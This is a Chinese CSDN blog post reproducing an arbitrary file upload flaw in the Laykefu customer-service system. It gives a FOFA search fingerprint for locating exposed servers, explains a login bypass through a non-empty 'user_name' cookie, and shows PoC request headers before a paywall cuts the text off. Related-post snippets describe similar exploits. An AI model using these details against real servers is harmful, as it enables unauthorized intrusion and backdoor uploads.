Laykefu客服系统 任意文件上传漏洞复现

已于 2024-01-21 22:33:22 修改
阅读量797 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-01-21 22:33:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135736609
版权

0x01 产品简介

Laykefu 是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统,旨在帮助企业有效管理和提供优质的客户服务。

0x02 漏洞概述

Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求中Cookie中的”user_name“不为空时即可绕过登录系统后台,未经身份验证的攻击者可利用此问题,上传后门文件,获取服务器权限。

0x03 复现环境

FOFA:icon_hash="-334624619"

0x04 漏洞复现

PoC

POST /admin/users/upavatar.html HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Workerman爬坑
weixin_43933091的博客
06-02 731
Workerman爬坑 Workerman在本地window运行没有问题,但是放到Linux服务器上面时,一直报错…… 问题1:failed: Error during WebSocket handshake: Unexpected response code: 404 我这里的原因是服务器的端口没有打开。 1、开放端口 firewall-cmd --zone=public --add-port=5672/tcp --permanent # 开放5672端口 firewall-cmd --zone=pu
Laykefu客服系统任意文件上传漏洞
qq_36334672的博客
01-25 269
Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求中Cookie中的”user_name“不为空时即可绕过登录系统后台,未经身份验证的攻击者可利用此问题,上传后门文件,获取服务器权限。
laykefu:thinkphp5 + workerman + gatewayworker构建的webim客服系统即时通讯
03-11
莱克夫 thinkphp5 + Gatewayworker建造的web客服系统 体验地址: ://www.laykefu.com 客服地址: //www.laykefu.com/service帐户密码:客服小美123456 后台管理地址: ://www.laykefu.com/admin帐户密码:暂不提供 github仓库: : 1.客户端接入 1,添加laykefu.css样式文件 <link href= "你的域名/static/customer/css/laykefu.css" rel= "stylesheet" type= "text/css" /> 2,添加jquery.js和laykefu.js文件 [removed][removed] <
Laykefu客服系统 任意文件上传漏洞
weixin_52204925的博客
01-22 478
Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台,恶意攻击者可利用此问题,上传后门文件,获取服务器权限。免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
畅捷通T+任意文件上传(CNVD-2022-60632 )漏洞复现
Ryan的博客
10-13 4439
2022年8月29日和8月30日,畅捷通公司紧急发布安全补丁修复了畅捷通T+软件任意文件上传漏洞。未经身份认证的攻击者利用该漏洞,通过绕过系统鉴权,在特定配置环境下实现任意文件的上传,从而执行任意代码,获得服务器控制权限。目前,已有用户被不法分子利用该漏洞进行勒索病毒攻击的情况出现。
thinkphp5在线客服系统如何搭建
mingyuexingzuo的博客
12-04 503
thinkphp5在线客服系统下载好了如何搭建呢?这里以宝塔为列子来演示,首先上传到宝塔网站下解压。网站伪静态配置,宝塔默认有tp框架的伪静态规则。安装数据库,导入数据库文件。然后就是改掉连接数据库账号密码。 更改代码,准备工作完毕 还需要改js的地方。laykefu.js 最底部代码,改成你自己的ip地址+端口。 启动gatawayworker相关服务 如果你是在windows上运行的话,直接双击/vendor/workerman/Conf/start_for_bat.bat即可 如果你是在
复现Laykefu客服系统后台漏洞合集_29
fushuang333的博客
01-26 1510
复现Laykefu客服系统后台漏洞合集,Laykefu客服系统是thinkphp5+Gatewayworker搭建的web客服系统
WebRTC被发现泄漏本地IP地址
biaobro的博客
03-28 8693
WebRTC,一种用于web通信的协议,最近它的一个漏洞被爆出。它可以显示本地用户的IP地址,即使他们已经通过使用虚拟私有网络加长字节来隐藏自己。Daniel Roesler,涉足加密学的San Francisco研究院,上周在GitHub上发表了一个示例,阐述了漏洞是如何工作的。Roesler 的概念验证(proof-of-concept)显示了网站是如何向STUN制造请求的。STUN(Sessi
php workerman内存溢出,ThinkPHP 3.2 整合 Workerman 踩坑
weixin_39575410的博客
03-25 636
由于需要开发长连接应用,要用到了Workerman,我是Windows的服务器,所以要把Wokerman装到windows,不得不说Windows做服务器那真是「好用」啊,一开始自己按照Workerman手册,结果发现装完后启动不了,网上找了很多安装教程都是基于linux的,win真的是少得可怜,仅有的几篇还不完整,最后大概花了一天的时候自己搞定的,分享出来,省得别人入坑。一号坑——整合TP3.2...
PHP常用框架及漏洞
小小猪的博客
08-14 2826
PHP常用框架及漏洞 PHP框架 laraval介绍: Laravel基于MVC架构,可以满足诸如事件处理、用户身份验证等各种需求,同时通过包管理实现模块化和可扩展的代码,并且对数据库管理有着健壮的支持。 漏洞: 1. Laravel 配置文件泄露 2. Laravel <= 8.4.2 存在远程代码执行漏洞 3. Laravel 存在SQL注入漏洞 4. Laravel 反序列化漏洞 CakePHP 介绍: ...
这才是真正D.S.T内部用的(tomcat漏洞)扫描工具
07-01
这才是真正D.S.T内部用的(tomcat漏洞)扫描工具解压缩密码: vip2008
workerman 实时通讯
08-31
利用 workerman 实现了即时通讯。 基于长连接,可以做即时通讯,直播,等等功能,也希望可以举一反三,实现其他功能。 具体看代码,github仓库 https://github.com/lizhilicctv/chat ,码云仓库,https://gitee.com/lizhiliwo/chat 实例网站:http://chat.biaotian.net 又不懂的可以和我交流,我的邮箱,[email protected] 记得给我点赞啊!也可以关注我其他作品,PHP框架!!!
shmilylbelva-laykefu-master.zip
05-18
客服系统,使用thinkphp+websocket开发的得客服系统。可自定义多客服客服分类,有专门的后台管理系统管理客服
TextDrive
congtaixiao7151的博客
05-26 69
TextDrive链接:http://forum.textdrive.com/viewforum.php?id=9 ...
Laykefu客服系统 任意文件上传
2301_80127209的博客
02-07 356
Laykefu 是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统,旨在帮助企业有效管理和提供优质的客户服务Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞
phpcms v9.任意文件上传漏洞复现
newlife1441的博客
08-15 4504
如果你也出现上面的情况请试试下面说的方法:这里有一个小坑注意,你在压缩前面的文件时要注意他们在压缩文件中的顺序,意思就是你创建的一个php文件在创建的txt文件的上面就可以成功,只有这样在解压失败后它还是能够保留并将php文件成功解压出来。时间竞争漏洞利用原理其实就是在解压文件后与删除限制的文件之间的时间空隙来利用提前在限制的文件中写好的利用代码在非解压目录下生成新的不会被删除的新文件(木马),通过这个木马来拿下网站。原理:这里我们通过利用解压文件在解压过程出错会导致后面的递归删除操作不会执行的特点。...
客服系统上传漏洞导致服务器被拿下(续)
weixin_30466953的博客
12-16 1159
上次说到我们的服务器因为这个客服系统被拿下后,我们在服务器后台进行了木马查杀,结果杀出了不少木马,但经过筛选之后,真正能执行的只有2个,查看这两个木马的创建时间,一个是3天前,也就是白帽子第一次尝试跟我们联系的时间点,而另外一个创建时间居然是几年前,在百思不得其解的情况下我们向这位白帽子进行了确认,他说自己只传了一个木马,另外一个绝对不是他的,话说回来,我们的客服系统才...
使用layui时遇到的bug
wxiao_xiao_miao的博客
09-10 599
使用内置模块时 1.先加载layui.js 2.加载模块 let 变量 = layui.模块名;(通常变量名与模块名相同,当使用layer弹出层模块时,不需要加载模块就可直接使用) 3.表单 3.1表单验证 3.1.1自定义 form.verify({}); 规则名称: [正则表达式, 不通过时的提示]或者function (a) { return不通过时的提示 } 3.1.2使用 ①给input加 lay-verify="验证规则 | 验证规则" ②form标签必须有 ...
Workerman学习(以thinkphp5为例)
weixin_34124577的博客
04-10 562
2019独角兽企业重金招聘Python工程师标准>>> ...
解锁Nginx跨域谜题:3步打造安全高效的CORS策略
最新发布
2401_85000826的博客
05-16 410
Nginx作为一款强大的Web服务器和反向代理服务器,经常被用于处理跨域资源共享(CORS,Cross-Origin Resource Sharing)策略,以允许或限制不同源之间的资源请求。CORS是一种安全策略,用于决定Web浏览器是否应允许从一个域名加载的网页访问另一个域名下的资源。下面将深入解析如何在Nginx配置中实现对origin(请求来源)的限制,以精确控制跨域请求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值